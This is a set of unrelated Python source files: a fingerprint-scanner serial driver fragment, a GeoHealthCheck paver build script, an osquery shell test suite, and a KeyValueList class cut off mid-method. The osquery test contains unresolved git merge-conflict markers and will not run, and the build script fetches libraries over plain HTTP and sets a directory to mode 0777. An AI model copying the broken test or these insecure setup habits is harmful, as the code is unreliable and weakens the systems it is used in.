return rp.ACK
def SetLED(self,on=True):
cp = Command_Packet('CmosLed',UseSerialDebug=self.UseSerialDebug)
cp.Parameter[0] = 0x01 if on else 0x00;
cp.Parameter[1] = 0x00;
cp.Parameter[2] = 0x00;
cp.Parameter[3] = 0x00;
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
retval = rp.ACK
del rp
del packetbytes
return retval
def CheckEnrolled(self,ID):
cp = Command_Packet('CheckEnrolled',UseSerialDebug=self.UseSerialDebug)
cp.ParameterFromInt(ID)
packetbytes = cp.GetPacketBytes()
del cp
self.SendCommand(packetbytes, 12)
del packetbytes
rp = self.GetResponse()
retval = rp.ACK
del rp
return retval
def EnrollStart(self,ID):
cp = Command_Packet('EnrollStart',UseSerialDebug=self.UseSerialDebug)
cp.ParameterFromInt(ID)
packetbytes = cp.GetPacketBytes()
del cp
self.SendCommand(packetbytes, 12)
del packetbytes
rp = self.GetResponse()
retval = 0
if not rp.ACK:
if rp.Error == rp.errors['NACK_DB_IS_FULL']:
retval = 1
elif rp.Error == rp.errors['NACK_INVALID_POS']:
retval = 2
elif rp.Error == rp.errors['NACK_IS_ALREADY_USED']:
retval = 3
del rp
return retval
def Enroll1(self):
cp = Command_Packet('Enroll1',UseSerialDebug=self.UseSerialDebug)
packetbytes = cp.GetPacketBytes()
del cp
self.SendCommand(packetbytes, 12)
del packetbytes
rp = self.GetResponse()
retval = rp.IntFromParameter()
retval = 3 if retval < 200 else 0
if not rp.ACK:
if rp.Error == rp.errors['NACK_ENROLL_FAILED']:
retval = 1
elif rp.Error == rp.errors['NACK_BAD_FINGER']:
retval = 2
return 0 if rp.ACK else retval
def Enroll2(self):
cp = Command_Packet('Enroll2',UseSerialDebug=self.UseSerialDebug)
packetbytes = cp.GetPacketBytes()
del cp
self.SendCommand(packetbytes, 12)
del packetbytes
rp = self.GetResponse()
retval = rp.IntFromParameter()
retval = 3 if retval < 200 else 0
if not rp.ACK:
if rp.Error == rp.errors['NACK_ENROLL_FAILED']:
retval = 1
elif rp.Error == rp.errors['NACK_BAD_FINGER']:
retval = 2
return 0 if rp.ACK else retval
def Enroll3(self):
cp = Command_Packet('Enroll3',UseSerialDebug=self.UseSerialDebug)
packetbytes = cp.GetPacketBytes()
del cp
self.SendCommand(packetbytes, 12)
del packetbytes
rp = self.GetResponse()
retval = rp.IntFromParameter()
retval = 3 if retval < 200 else 0
if not rp.ACK:
if rp.Error == rp.errors['NACK_ENROLL_FAILED']:
retval = 1
elif rp.Error == rp.errors['NACK_BAD_FINGER']:
retval = 2
return 0 if rp.ACK else retval
def IsPressFinger(self):
cp = Command_Packet('IsPressFinger',UseSerialDebug=self.UseSerialDebug)
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
pval = rp.ParameterBytes[0]
pval += rp.ParameterBytes[1]
pval += rp.ParameterBytes[2]
pval += rp.ParameterBytes[3]
retval = True if pval == 0 else False
del rp
del packetbytes
del cp
return retval
def DeleteID(self,ID):
cp = Command_Packet('DeleteID',UseSerialDebug=self.UseSerialDebug)
cp.ParameterFromInt(ID)
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
retval = rp.ACK
del rp
del packetbytes
del cp
return retval
def Identify1_N(self):
cp = Command_Packet('Identify1_N',UseSerialDebug=self.UseSerialDebug)
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
retval = rp.IntFromParameter()
if retval > 200:
retval = 200
del rp
del packetbytes
del cp
return retval
def CaptureFinger(self,highquality=True):
cp = Command_Packet('CaptureFinger',UseSerialDebug=self.UseSerialDebug)
cp.ParameterFromInt(1 if highquality else 0)
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
retval = rp.ACK
del rp
del packetbytes
del cp
return retval
def GetTemplate(self, ID):
'''
Gets a template from the fps (498 bytes) in 4 Data_Packets
Use StartDataDownload, and then GetNextDataPacket until done
Parameter: 0-199 ID number
Returns:
0 - ACK Download starting
1 - Invalid position
2 - ID not used (no template to download
'''
cp = Command_Packet('GetTemplate',UseSerialDebug=self.UseSerialDebug)
cp.ParameterFromInt(ID)
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
retval = 0
if not rp.ACK:
if rp.Error == rp.errors['NACK_INVALID_POS']:
retval = 1
elif rp.Error == rp.errors['NACK_IS_NOT_USED']:
retval = 2
return retval
| |
# =================================================================
#
# Authors: Tom Kralidis <tomkralidis@gmail.com>
#
# Copyright (c) 2014 Tom Kralidis
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import glob
import os
import shutil
import tempfile
from StringIO import StringIO
from urllib2 import urlopen
import zipfile
from paver.easy import (Bunch, call_task, cmdopts, info, options,
path, pushd, sh, task)
BASEDIR = os.path.abspath(os.path.dirname(__file__))
options(
base=Bunch(
home=path(BASEDIR),
docs=path('%s/docs' % BASEDIR),
instance=path('%s/instance' % BASEDIR),
pot=path('%s/GeoHealthCheck/translations/en/LC_MESSAGES/messages.po' %
BASEDIR),
static_docs=path('%s/GeoHealthCheck/static/docs' % BASEDIR),
static_lib=path('%s/GeoHealthCheck/static/lib' % BASEDIR),
tmp=path(tempfile.mkdtemp()),
translations=path('%s/GeoHealthCheck/translations' % BASEDIR)
),
)
@task
def setup():
"""setup plugin dependencies"""
config_file = options.base.home / 'GeoHealthCheck/config_main.py'
config_site = options.base.instance / 'config_site.py'
# setup dirs
if not os.path.exists(options.base.static_lib):
options.base.static_lib.mkdir()
if not os.path.exists(options.base.instance):
options.base.instance.mkdir()
data_dir = options.base.instance / 'data'
data_dir.mkdir()
# data_dir.chmod(0777) gives failure on Python 2.7 Paver 1.2.1
os.chmod(path(data_dir), 0o777)
# setup config
config_file.copy(config_site)
# setup deps
sh('pip install -r requirements.txt')
skin = 'http://github.com/BlackrockDigital/startbootstrap-sb-admin-2/archive/v3.3.7+1.zip' # noqa
skin_dirs = ['dist', 'vendor']
need_to_fetch = False
for skin_dir in skin_dirs:
skin_dir_path = os.sep.join(
['startbootstrap-sb-admin-2-3.3.7-1', skin_dir])
if not os.path.exists(skin_dir_path):
need_to_fetch = True
if need_to_fetch:
zipstr = StringIO(urlopen(skin).read())
zipfile_obj = zipfile.ZipFile(zipstr)
zipfile_obj.extractall(options.base.static_lib)
for zf_mem in skin_dirs:
src_loc = path(options.base.static_lib /
'startbootstrap-sb-admin-2-3.3.7-1' / zf_mem)
dest_loc = path(options.base.static_lib / zf_mem)
if not os.path.exists(dest_loc):
src_loc.move(dest_loc)
else:
info('directory already exists. Skipping')
shutil.rmtree(path(options.base.static_lib /
'startbootstrap-sb-admin-2-3.3.7-1'))
# install sparklines to static/site/js
with open(path(options.base.static_lib / 'jspark.js'), 'w') as f:
content = urlopen('http://ejohn.org/files/jspark.js').read()
content.replace('red', 'green')
f.write(content)
# install bootstrap-tagsinput to static/lib
info('Getting select2')
select2 = 'https://github.com/select2/select2/archive/4.0.3.zip'
zipstr = StringIO(urlopen(select2).read())
zipfile_obj = zipfile.ZipFile(zipstr)
zipfile_obj.extractall(options.base.static_lib)
dirname = glob.glob(options.base.static_lib / 'select2-*')[0]
dstdir = ''.join(dirname.rsplit('-', 1)[:-1])
try:
os.rename(dirname, dstdir)
except OSError:
shutil.rmtree(dstdir)
os.rename(dirname, dstdir)
# install leafletjs to static/lib
info('Getting leaflet')
leafletjs = 'http://cdn.leafletjs.com/downloads/leaflet-0.7.5.zip'
zipstr = StringIO(urlopen(leafletjs).read())
zipfile_obj = zipfile.ZipFile(zipstr)
zipfile_obj.extractall(options.base.static_lib / 'leaflet')
# install html5shiv to static/lib
with open(path(options.base.static_lib / 'html5shiv.min.js'), 'w') as f:
url = 'http://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js'
content = urlopen(url).read()
f.write(content)
# install respond to static/lib
with open(path(options.base.static_lib / 'respond.min.js'), 'w') as f:
url = 'http://oss.maxcdn.com/respond/1.4.2/respond.min.js'
content = urlopen(url).read()
f.write(content)
# build i18n .mo files
call_task('compile_translations')
# build local docs
call_task('refresh_docs')
# message user
info('GeoHealthCheck is now built. Edit settings in %s' % config_site)
info('before deploying the application. Alternatively, you can start a')
info('development instance with "python GeoHealthCheck/app.py"')
@task
def create_secret_key():
"""create secret key for SECRET_KEY in instance/config_site.py"""
info('Secret key: \'%s\'' % os.urandom(24).encode('hex'))
info('Copy/paste this key to set the SECRET_KEY')
info('value in instance/config_site.py')
@task
@cmdopts([
('email=', 'e', 'email'),
('username=', 'u', 'username'),
('password=', 'p', 'password')
])
def create(options):
"""create database objects and superuser account"""
args = ''
username = options.get('username', None)
password = options.get('password', None)
email = options.get('email', None)
if all([username, password, email]):
args = '%s %s %s' % (username, password, email)
sh('python %s create %s' % (path('GeoHealthCheck/models.py'), args))
@task
@cmdopts([
('password=', 'p', 'password')
])
def create_hash(options):
"""
Create hash, mainly for passwords.
Usage: paver create_hash -p mypass
"""
import sys
sys.path.insert(0, BASEDIR)
from GeoHealthCheck.util import create_hash
token = create_hash(options.get('password', None))
info('Copy/paste the entire token below for example to set password')
info(token)
@task
def upgrade():
"""upgrade database if changed; be sure to backup first!"""
info('Upgrading database...')
with pushd(path('%s/GeoHealthCheck' % BASEDIR)):
sh('python manage.py db upgrade')
@task
def create_wsgi():
"""create WSGI wrapper and Apache2 configuration"""
wsgi_script = '%s%sGeoHealthCheck.wsgi' % (options.base.instance, os.sep)
with open(wsgi_script, 'w') as ff:
ff.write('import sys\n')
ff.write('sys.path.insert(0, \'%s\')\n' % BASEDIR)
ff.write('from GeoHealthCheck.app import APP as application')
wsgi_conf = '%s%sGeoHealthCheck.conf' % (options.base.instance, os.sep)
with open(wsgi_conf, 'w') as ff:
ff.write('WSGIScriptAlias / %s%sGeoHealthCheck.wsgi\n' %
(options.base.instance, os.sep))
ff.write('<Directory %s%s>\n' % (BASEDIR, os.sep))
ff.write('Order deny,allow\n')
ff.write('Allow from all\n')
ff.write('</Directory>')
@task
def refresh_docs():
"""Build sphinx docs from scratch"""
make = sphinx_make()
if os.path.exists(options.base.static_docs):
shutil.rmtree(options.base.static_docs)
with pushd(options.base.docs):
sh('%s clean' % make)
sh('%s html' % make)
source_html_dir = path('%s/docs/_build/html' % BASEDIR)
source_html_dir.copytree(options.base.static_docs)
@task
def clean():
"""clean environment"""
if os.path.exists(options.base.static_lib):
shutil.rmtree(options.base.static_lib)
if os.path.exists(options.base.tmp):
shutil.rmtree(options.base.tmp)
if os.path.exists(options.base.static_docs):
shutil.rmtree(options.base.static_docs)
@task
def extract_translations():
"""extract translations wrapped in _() or gettext()"""
pot_dir = path('GeoHealthCheck/translations/en/LC_MESSAGES')
if not os.path.exists(pot_dir):
pot_dir.makedirs()
sh('pybabel extract -F babel.cfg -o %s GeoHealthCheck' % options.base.pot)
@task
@cmdopts([
('lang=', 'l', '2-letter language code'),
])
def add_language_catalogue(options):
"""adds new language profile"""
lang = options.get('lang', None)
if lang is None:
raise RuntimeError('missing lang argument')
sh('pybabel init -i %s -d %s -l %s' % (
options.base.pot, options.base.translations, lang))
@task
def compile_translations():
"""build .mo files"""
sh('pybabel compile -d %s' % options.base.translations)
@task
def update_translations():
"""update language strings"""
call_task('extract_translations')
sh('pybabel update -i %s -d %s' % (
options.base.pot, options.base.translations))
@task
def runner_daemon():
"""Run the HealthCheck runner daemon scheduler"""
sh('python %s' % path('GeoHealthCheck/scheduler.py'))
@task
def run_healthchecks():
"""Run all HealthChecks directly"""
sh('python %s' % path('GeoHealthCheck/healthcheck.py'))
def sphinx_make():
"""return what command Sphinx is using for make"""
if os.name == 'nt':
return 'make.bat'
return 'make'
| |
#!/usr/bin/env python
# Copyright (c) 2014-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pyexpect.replwrap will not work with unicode_literals
# from __future__ import unicode_literals
import os
import random
import unittest
# osquery-specific testing utils
import test_base
SHELL_TIMEOUT = 10
EXIT_CATASTROPHIC = 78
class OsqueryiTest(unittest.TestCase):
def setUp(self):
self.binary = os.path.join(test_base.ARGS.build, "osquery", "osqueryi")
self.osqueryi = test_base.OsqueryWrapper(self.binary)
self.dbpath = "%s%s" % (
test_base.CONFIG["options"]["database_path"],
str(random.randint(1000, 9999)))
def test_error(self):
'''Test that we throw an error on bad query'''
self.osqueryi.run_command(' ')
self.assertRaises(test_base.OsqueryException,
self.osqueryi.run_query, 'foo')
@test_base.flaky
def test_config_check_success(self):
'''Test that a 0-config passes'''
proc = test_base.TimeoutRunner([
self.binary,
"--config_check",
"--database_path=%s" % (self.dbpath),
"--config_path=%s/test.config" % test_base.SCRIPT_DIR
],
<<<<<<< HEAD
SHELL_TIMEOUT)
self.assertEqual(proc.stdout, "")
print(proc.stdout)
print(proc.stderr)
=======
SHELL_TIMEOUT)
self.assertEqual(proc.stdout, "")
print(proc.stdout)
print(proc.stderr)
self.assertEqual(proc.proc.poll(), 0)
@test_base.flaky
def test_config_dump(self):
'''Test that config raw output is dumped when requested'''
config = "%s/test_noninline_packs.conf" % test_base.SCRIPT_DIR
proc = test_base.TimeoutRunner([
self.binary,
"--config_dump",
"--config_path=%s" % config
],
SHELL_TIMEOUT)
content = ""
with open(config, 'r') as fh: content = fh.read()
self.assertEqual(proc.stdout, "{\"%s\": %s}\n" % (config, content))
print (proc.stderr)
>>>>>>> 769a723b5ccb97037b678a874480f37beb2281c6
self.assertEqual(proc.proc.poll(), 0)
@test_base.flaky
def test_config_check_failure_invalid_path(self):
'''Test that a missing config fails'''
proc = test_base.TimeoutRunner([
self.binary,
"--config_check",
"--database_path=%s" % (self.dbpath),
"--config_path=/this/path/does/not/exist"
],
SHELL_TIMEOUT)
self.assertNotEqual(proc.stderr, "")
print(proc.stdout)
print(proc.stderr)
self.assertEqual(proc.proc.poll(), 1)
@test_base.flaky
def test_config_check_failure_valid_path(self):
# Now with a valid path, but invalid content.
proc = test_base.TimeoutRunner([
self.binary,
"--config_check",
"--database_path=%s" % (self.dbpath),
"--config_path=%s/test.badconfig" % test_base.SCRIPT_DIR
],
SHELL_TIMEOUT)
self.assertEqual(proc.proc.poll(), 1)
self.assertNotEqual(proc.stderr, "")
@test_base.flaky
def test_config_check_failure_missing_plugin(self):
# Finally with a missing config plugin
proc = test_base.TimeoutRunner([
self.binary,
"--config_check",
"--database_path=%s" % (self.dbpath),
"--config_plugin=does_not_exist"
],
<<<<<<< HEAD
=======
SHELL_TIMEOUT)
self.assertNotEqual(proc.stderr, "")
self.assertNotEqual(proc.proc.poll(), 0)
# Also do not accept a SIGSEG
self.assertEqual(proc.proc.poll(), EXIT_CATASTROPHIC)
@test_base.flaky
def test_config_check_example(self):
'''Test that the example config passes'''
example_path = "deployment/osquery.example.conf"
proc = test_base.TimeoutRunner([
self.binary,
"--config_check",
"--config_path=%s/../%s" % (test_base.SCRIPT_DIR, example_path)
],
>>>>>>> 769a723b5ccb97037b678a874480f37beb2281c6
SHELL_TIMEOUT)
self.assertEqual(proc.stdout, "")
print (proc.stdout)
print (proc.stderr)
self.assertEqual(proc.proc.poll(), 0)
def test_meta_commands(self):
'''Test the supported meta shell/help/info commands'''
commands = [
'.help',
'.all',
'.all osquery_info',
'.all this_table_does_not_exist',
'.echo',
'.echo on',
'.echo off',
'.header',
'.header off',
'.header on',
'.mode',
'.mode csv',
'.mode column',
'.mode line',
'.mode list',
'.mode pretty',
'.mode this_mode_does_not_exists',
'.nullvalue',
'.nullvalue ""',
'.print',
'.print hello',
'.schema osquery_info',
'.schema this_table_does_not_exist',
'.schema',
'.separator',
'.separator ,',
'.show',
'.tables osquery',
'.tables osquery_info',
'.tables this_table_does_not_exist',
'.tables',
'.trace',
'.width',
'.width 80',
'.timer',
'.timer on',
'.timer off'
]
for command in commands:
result = self.osqueryi.run_command(command)
pass
@test_base.flaky
def test_time(self):
'''Demonstrating basic usage of OsqueryWrapper with the time table'''
self.osqueryi.run_command(' ') # flush error output
result = self.osqueryi.run_query(
'SELECT hour, minutes, seconds FROM time;')
self.assertEqual(len(result), 1)
row = result[0]
self.assertTrue(0 <= int(row['hour']) <= 24)
self.assertTrue(0 <= int(row['minutes']) <= 60)
self.assertTrue(0 <= int(row['seconds']) <= 60)
@test_base.flaky
def test_time_using_all(self):
self.osqueryi.run_command(' ')
result = self.osqueryi.run_command('.all time')
self.assertNotEqual(result.rstrip(), "Error querying table: time")
@test_base.flaky
def test_config_bad_json(self):
self.osqueryi = test_base.OsqueryWrapper(self.binary,
args={"config_path": "/"})
result = self.osqueryi.run_query('SELECT * FROM time;')
self.assertEqual(len(result), 1)
if __name__ == '__main__':
test_base.Tester().run()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2015, Nigel Small
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
class KeyValueList(list):
""" A KeyValueList is a list of key-value pairs that functions as an
ordered dictionary with support for duplicate keys.
An instance can be created using either an iterable sequence of pairs or a
mapping plus an optional set of keyword arguments:
>>> kvl = KeyValueList([('a', 1), ('c', 7), 'cx', ('b', [8, 9])], c='b')
>>> kvl
KeyValueList([('a', 1), ('c', 7), ('c', 'x'), ('b', [8, 9]), ('c', 'b')])
This creates a list of values that have both an associated key and a
positional index:
index | key | value
-------+-----+--------
0 | 'a' | 1
1 | 'c' | 7
2 | 'c' | 1
3 | 'b' | [8, 9]
4 | 'c' | 'b'
"""
def __init__(self, iterable=(), **kwargs):
list.__init__(self)
self.extend(iterable)
self.extend(kwargs)
def __repr__(self):
return "{0}({1})".format(self.__class__.__name__, list.__repr__(self))
def __getitem__(self, index):
""" Get a single item.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl[2]
('green', 'grass')
>>> kvl[9]
Traceback (most recent call last):
File "<stdin>", line 1, in ?
IndexError: list index out of range
"""
try:
got = list.__getitem__(self, index)
except TypeError:
try:
return next(self.get(index))
except StopIteration:
return None
else:
if isinstance(index, slice):
return KeyValueList(got)
else:
return got
def __getslice__(self, start, end):
""" Get a slice of items.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl[1:3]
KeyValueList([('blue', 'sea'), ('green', 'grass')])
"""
try:
return KeyValueList(list.__getslice__(self, start, end))
except AttributeError:
return KeyValueList(list.__getitem__(self, slice(start, end)))
def __setitem__(self, index, item):
""" Set a single item.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl[1] = ('yellow', 'sun')
>>> for item in kvl:
... print(item)
('red', 'rose')
('yellow', 'sun')
('green', 'grass')
('blue', 'sky')
>>> kvl[9] = ('orange', 'orange')
Traceback (most recent call last):
File "<stdin>", line 1, in ?
IndexError: list assignment index out of range
"""
list.__setitem__(self, index, item)
def __setslice__(self, start, stop, items):
""" Set a slice of items.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl[1:3] = [('yellow', 'sun'), ('grey', 'stone'), ('red', 'berry')]
>>> for item in kvl:
... print(item)
('red', 'rose')
('yellow', 'sun')
('grey', 'stone')
('red', 'berry')
('blue', 'sky')
"""
list.__setslice__(self, start, stop, items)
def __delitem__(self, index):
""" Delete a single item.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> del kvl[1]
>>> for item in kvl:
... print(item)
('red', 'rose')
('green', 'grass')
('blue', 'sky')
>>> del kvl[9]
Traceback (most recent call last):
File "<stdin>", line 1, in ?
IndexError: list assignment index out of range
"""
list.__delitem__(self, index)
def __delslice__(self, start, end):
""" Delete a slice of items.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> del kvl[1:3]
>>> for item in kvl:
... print(item)
('red', 'rose')
('blue', 'sky')
"""
list.__delslice__(self, start, end)
def __contains__(self, item):
""" Check for the presence of a particular key-value pair within this
list. This is equivalent to the `has_item` method.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> ('blue', 'sea') in kvl
True
>>> ('yellow', 'sun') in kvl
False
>>> ('purple', 'grape') not in kvl
True
>>> ('red', 'rose') not in kvl
False
"""
key, value = item
return self.has_item(key, value)
def __iter__(self):
""" Iterate through all items in this list. This is equivalent to the
`items` method with `collect` set to False.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for key, value in kvl:
... print("{0} -> {1}".format(key, value))
red -> rose
blue -> sea
green -> grass
blue -> sky
"""
return list.__iter__(self)
def append(self, key, value):
""" Append a single key-value pair to the end of this list.
>>> kvl = KeyValueList()
>>> kvl.append('one', 'eins')
>>> kvl.append('two', 'zwei')
>>> kvl.append('three', 'drei')
>>> for item in kvl:
... print(item)
('one', 'eins')
('two', 'zwei')
('three', 'drei')
"""
list.append(self, (key, value))
def extend(self, iterable):
""" Concatenate two lists by adding a list of extra items to the end
of this list. Each item added must be capable of being unpacked into a
key-value pair.
>>> kvl = KeyValueList([('one', 'eins'), ('two', 'zwei')])
>>> kvl.extend([('three', 'drei'), ('four', 'vier')])
>>> for item in kvl:
... print(item)
('one', 'eins')
('two', 'zwei')
('three', 'drei')
('four', 'vier')
>>> kvl.extend(['five', 'six'])
Traceback (most recent call last):
File "<stdin>", line 1, in ?
ValueError: KeyValueList items must be pairs
"""
if isinstance(iterable, Mapping):
list.extend(self, iterable.items())
else:
try:
list.extend(self, ((k, v) for k, v in iterable))
except ValueError:
raise ValueError("KeyValueList items must be pairs")
def insert(self, index, key, value):
""" Insert a key-value pair at a particular position within the list:
>>> kvl = KeyValueList({'three': 'drei'})
>>> kvl.insert(0, 'one', 'eins')
>>> kvl.insert(1, 'two', 'zwei')
>>> for item in kvl:
... print(item)
('one', 'eins')
('two', 'zwei')
('three', 'drei')
"""
list.insert(self, index, (key, value))
def has_item(self, key, value):
""" Check for the presence of a particular key-value pair within this
list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl.has_item('green', 'grass')
True
>>> kvl.has_item('pink', 'rose')
False
"""
for k, v in self:
if k == key and v == value:
return True
return False
def has_key(self, key):
""" Check for the presence of a particular key within this list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl.has_key('blue')
True
>>> kvl.has_key('yellow')
False
"""
for k, v in self:
if k == key:
return True
return False
def has_value(self, value):
""" Check for the presence of a particular value within this list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl.has_value('grass')
True
>>> kvl.has_value('sun')
False
"""
for k, v in self:
if v == value:
return True
return False
def get(self, key):
""" Iterate through all values associated with the specified key.
Non-existent keys return empty iterators.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for value in kvl.get('blue'):
... print(value)
sea
sky
>>> for value in kvl.get('yellow'):
... print(value)
"""
return (v for k, v in self if k == key)
def put(self, key, *values):
""" Replace all values associated with the specified key with the
value arguments provided. If fewer values are specified than currently
exist, remaining items will be removed; if more items are specified,
these will be appended to the end of the list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('blue', 'sky')])
>>> kvl.put('blue', 'jeans')
>>> kvl
KeyValueList([('red', 'rose'), ('blue', 'jeans')])
>>> kvl.put('red', 'heart', 'berry')
>>> kvl
KeyValueList([('red', 'heart'), ('blue', 'jeans'), ('red', 'berry')])
"""
new_values = list(values)
self[:] = [
(k, value) if k != key else (k, new_values.pop(0))
for k, value in self
if k != key or new_values
]
self.extend([(key, value) for value in new_values])
def remove(self, key):
""" Remove all items from this list that contain the key specified. If
the key is not found, a ValueError is raised.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl.remove('blue')
>>> kvl
KeyValueList([('red', 'rose'), ('green', 'grass')])
>>> kvl.remove('yellow')
Traceback (most recent call last):
File "<stdin>", line 1, in ?
ValueError: Key 'yellow' not in list
"""
length = len(self)
self[:] = ((k, v) for k, v in self if k != key)
if len(self) == length:
raise ValueError("Key {0} not in list".format(repr(key)))
def pop(self, index=None):
""" Remove the item at the index specified and return it. If no index
is specified, the last item is popped. If the index is out of range, an
IndexError is raised.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl.pop(2)
('green', 'grass')
>>> kvl.pop()
('blue', 'sky')
>>> kvl.pop(6)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
IndexError: pop index out of range
"""
if index is None:
return list.pop(self)
else:
return list.pop(self, index)
def clear(self):
""" Remove all items from this list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> len(kvl)
4
>>> kvl.clear()
>>> len(kvl)
0
"""
del self[:]
def sort(self, *args, **kwargs):
""" Sort the items in this list into ascending order.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for item in kvl:
... print(item)
('red', 'rose')
('blue', 'sea')
('green', 'grass')
('blue', 'sky')
>>> kvl.sort()
>>> for item in kvl:
... print(item)
('blue', 'sea')
('blue', 'sky')
('green', 'grass')
('red', 'rose')
"""
list.sort(self, *args, **kwargs)
def reverse(self):
""" Reverse the order of items in this list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for item in kvl:
... print(item)
('red', 'rose')
('blue', 'sea')
('green', 'grass')
('blue', 'sky')
>>> kvl.reverse()
>>> for item in kvl:
... print(item)
('blue', 'sky')
('green', 'grass')
('blue', 'sea')
('red', 'rose')
"""
list.reverse(self)
def copy(self):
""" Create and return a shallow copy of this list instance.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea')])
>>> kvl
KeyValueList([('red', 'rose'), ('blue', 'sea')])
>>> kvl2 = kvl.copy()
>>> kvl2.append('green', 'grass')
>>> kvl
KeyValueList([('red', 'rose'), ('blue', 'sea')])
>>> kvl2
KeyValueList([('red', 'rose'), ('blue', 'sea'), ('green', 'grass')])
"""
return KeyValueList(self)
def iterkeys(self, collect=False):
""" Iterate through the keys in this list. If `collect` is True,
yield only unique keys.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for key in kvl.iterkeys():
... print(key)
red
blue
green
blue
>>> for key in kvl.iterkeys(collect=True):
... print(key)
red
blue
green
"""
if collect:
keys = []
for k, v in self:
if k not in keys:
keys.append(k)
yield k
else:
for k, v in self:
yield k
def itervalues(self, collect=False):
""" Iterate through the values in this list. If `collect` is True,
yield a list of values for each unique key.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for key in kvl.itervalues():
... print(key)
rose
sea
grass
sky
>>> for key in kvl.itervalues(collect=True):
... print(key)
['rose']
['sea', 'sky']
['grass']
"""
if collect:
keys, values = [], []
for k, v in self:
try:
index = keys.index(k)
except ValueError:
keys.append(k)
values.append([v])
else:
values[index].append((v))
for value in values:
yield value
else:
for k, v in self:
yield v
def iteritems(self, collect=False):
""" Iterate through the items in this list. If `collect` is True,
yield only one item for each unique key, each with a list of
associated values.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for key in kvl.iteritems():
... print(key)
('red', 'rose')
('blue', 'sea')
('green', 'grass')
('blue', 'sky')
>>> for key in kvl.iteritems(collect=True):
... print(key)
('red', ['rose'])
('blue', ['sea', 'sky'])
('green', ['grass'])
"""
if collect:
keys, items = [], []
